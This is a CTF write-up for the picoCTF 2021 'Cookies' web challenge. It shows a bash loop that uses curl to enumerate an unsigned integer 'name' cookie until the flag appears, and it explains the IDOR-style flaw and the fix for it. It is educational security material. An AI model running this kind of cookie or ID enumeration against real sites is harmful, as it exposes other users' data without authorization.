picoCTF Solutions
picoCTF 2021Web ExploitationEasy

Cookies picoCTF 2021 Solution

Published: April 2, 2026

Description

Who doesn't love cookies? Find the best cookie at this web challenge.

Setup

Remote

Navigate to the challenge URL and observe the cookie set by the server.

bash
# Visit the URL in your browser and check the cookies in DevTools (Application > Cookies)

Solution

Walk me through it
  1. Step 1Observe the name cookie
    When you visit the site, it sets a cookie named 'name' with an integer value (starting at 0). The server maps this integer to different items in its database. You need to find which integer value corresponds to the flag entry by iterating through values.
    Learn more

    HTTP cookies are key-value pairs stored in the browser and sent with every request to the server. The server uses the Set-Cookie response header to set them, and the browser sends them back in the Cookie request header. Here, the cookie value is a plain integer with no signing or encryption - making it trivially forgeable.

  2. Step 2Brute-force the cookie value
    Iterate the cookie value with curl and grep for the picoCTF prefix. 0-100 covers most CTF-scale databases; bump to 0-1000 if nothing hits.
    bash
    # Sweep 0-100, print only matches:
    bash
    for i in $(seq 0 100); do flag=$(curl -s -b "name=$i" http://<server>/check | grep -oE 'picoCTF\{[^}]*\}'); [ -n "$flag" ] && echo "id=$i $flag"; done
    bash
    # If nothing matches, widen the range:
    bash
    for i in $(seq 0 1000); do flag=$(curl -s -b "name=$i" http://<server>/check | grep -oE 'picoCTF\{[^}]*\}'); [ -n "$flag" ] && echo "id=$i $flag" && break; done
    Learn more

    Why 0-100 first. Most CTF web apps seed their cookie database with a tiny ordered set of items - the flag entry typically lives in the first hundred IDs because the challenge is designed to be solved in seconds, not hours. Widen to 0-1000 only if the small sweep produces nothing.

    Detect success on the response, not the status code. A 200 response is not a success signal here - every integer returns 200. The signal is whether the page body contains the flag prefix. Piping through grep -oE 'picoCTF{[^}]*}' isolates the flag string and skips noisy IDs.

    This is an insecure direct object reference (IDOR)-style vulnerability combined with an unauthenticated enumeration attack. The server stores the flag at a specific ID in its cookie database and retrieves it based solely on the client-supplied cookie value, with no authentication check. The fix: never trust client-supplied identifiers alone for authorization; pair them with server-side session validation. For more on cookie-related bug shapes, see cookies and JWTs in CTF.

Flag

picoCTF{...}

The server maps integer cookie values to items in a database - brute-forcing the integer reveals which value corresponds to the flag entry.

Want more picoCTF 2021 writeups?

Browse picoCTF 2021Full library

Tools used in this challenge

Related reading

What to try next